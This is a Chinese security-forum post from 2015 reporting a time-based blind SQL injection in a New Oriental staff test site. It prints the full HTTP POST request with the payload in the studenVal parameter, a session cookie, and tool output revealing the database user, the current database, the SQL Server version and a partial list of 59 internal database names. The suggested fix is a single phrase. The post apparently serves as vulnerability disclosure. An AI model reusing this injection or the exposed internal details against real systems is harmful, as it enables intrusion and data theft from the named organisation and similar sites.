首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 茶余饭后
    3. 发新帖
新东方某站点MSSQL盲注
发表于: 2015-7-8 08:45 1434

新东方某站点MSSQL盲注

踏雪不留痕 活跃值
2015-7-8 08:45
1434
新东方某站点MSSQL盲注

注射点:

POST /p/Handler/ApiHandler.ashx HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 1aeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2&6N6r3g2K6N6q4)9J5k6i4y4@1j5h3k6X3i4K6u0W2P5r3c8X3i4K6u0W2j5$3^5`.
Cookie: ASP.NET_SessionId=hkjmbgvondvsrk55zj1jxc45
Host: xytest.staff.xdf.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

OpType=IsValidate&studenType=3&studenVal=123456*%20--%20

参数studenVal可注入。MSSQL time blind.

current user: 'shanqibin'
current database:    'NISmember0311'
back-end DBMS: Microsoft SQL Server 2008
[11:36:03] [INFO] fetching database names
[11:36:03] [INFO] fetching number of databases
[11:36:03] [INFO] resumed: 59
[11:36:03] [INFO] resumed: A2
[11:36:03] [INFO] resumed: aaa
[11:36:03] [INFO] resumed: AD_PASSPORT_DB
[11:36:03] [INFO] resumed: API
[11:36:03] [INFO] resumed: aspnetdb
[11:36:03] [INFO] resumed: BJ20140519
[11:36:03] [INFO] resumed: BJ20140520
[11:36:03] [INFO] resumed: BJ20140606
[11:36:03] [INFO] resumed: BJ201406061400
[11:36:03] [INFO] resumed: BJ20140714
[11:36:03] [INFO] resumed: BJ20140714_001
[11:36:03] [INFO] resumed: BJ20140915
[11:36:03] [INFO] resumed: bjnis_crm
[11:36:03] [INFO] resumed: BJTEST
[11:36:03] [INFO] resumed: BJTEST_DY
[11:36:03] [INFO] resumed: bushutest
[11:36:03] [INFO] resumed: CQ0825
[11:36:03] [INFO] resumed: CQNIS0519
[11:36:03] [INFO] resumed: CS0818
[11:36:03] [INFO] resumed: DevRequire

有59个库,上面只跑了一部分。

解决方案:
参数过滤

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回